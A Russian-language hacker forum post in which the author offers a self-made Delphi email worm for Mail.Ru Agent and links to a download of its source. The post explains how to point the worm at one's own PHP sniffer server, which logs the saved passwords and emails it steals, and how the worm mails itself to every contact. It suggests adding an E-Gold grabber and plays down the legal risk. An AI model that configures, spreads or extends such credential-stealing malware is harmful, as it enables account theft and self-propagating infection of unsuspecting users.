ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Эта идея витала в моих мозгах (да, да, они все таки есть!!! =) ) уже давно, реализовать я ее решил под впечатлением от статьи _1nf3ct0r_ "Вирусы, изменившие мир", а заключается она в написании E-Mail червя. Как жертву я выбрал весьма популярный пейджер Mail.Ru Agent (кхм, кхм я например на понимаю причины его популярности, как пейджер ему никогда не затмить ICQ, как почтовый клиент он ваще полный ацтой). По идее можно создать просто разможающегося и ничего не делающего червя, но это не интересено =)), у нас он будет еще собирать сохраненные (!) пассы от все того же многострадального Mail.Ru Agent'a. Так как я не пишу статью, а просто выкладываю уже сделанный "инструмент", то тех. реализацию описывать не буду, только рассказ о настройке ворма =). Итак, сам червь я сделал на Delphi (если кому интересно, то на 7 =) ), ничего дополнительно ставить не надо, достаточно иметь Делфи. Перед компиляцией необходимо изменить константы Server_Addr и Script_Name на адрес своего сервера и имя скрипта (Сейчас расскажу зачем). Как уже упоминалось нам нужен сервант, и не просто сервант, а сервант с php =). Туда мы зальем сниффер, на который будут передавться пароли и e-mail'ы жертв (ведь мы же делаем e-mail червя, не забыл? =) ). Сниффер будет
писать пассы в лог а также рассылать ворма по всем известным контактам, откуда мы потом их и возьмем (лог не находится в открытом доступе и без знания пароля его не возьмешь =) ). Ну вот, надеюсь объяснил все понятно и доходчиво =))). В качестве вывода можно сделать схемку:

-Мейл-червь, ориентированый на распространение среди пользователей @mail.ru
-Отсылаем его кому нибудь, с кого начнется цепь
-Чел скачивает, запускает...
-После этого червь начинает рассылать себя всем по контакт листу и тянет пароли от м-агента
-Идет цепная реакция

На эту платформу кроме утягиванию паролей от Агента можно поставить любые другие возможности, вплоть до Е-Голд граббера =)) (впрочем сомневаюсь, что у людей у которых стоит Mail.Ru Agent имеется хотя бы акк на еголде =) ). Исходники сниффера и червя качаем тута: http://ggg123321.narod.ru/mraw0rm.rar.
Теперь пару слов о законности, согласно УК РФ мы с тобой совершаем настоящее преступление =), конечно за то что ты возьмешь пару-тройку мыльниц тебе ничего не будет (на тебя даже вряд ли заявят, не говоря уже о том что искать 100 % не будут), но если ты по моему доброму совету приколбасишь туда нечто типа Е-Голд граббера и не позаботишься о своей анонимности, то есть шанс реально сесть =(.
Копирайты на червяка принадлежат мне (А®ТеS'у), своему детищу я даю имя Варлок_12000, единственное что ты не имеешь права делать это продавать программу =)
На этой веселой ноте я позволю себе откланятся, до новых встреч =)).
З.Ы. Все вопросы задаем в теме, предложения можно в теме или в асю 903-521 (предложения типа "написать кульный WM трой" не рассматриваются заранее).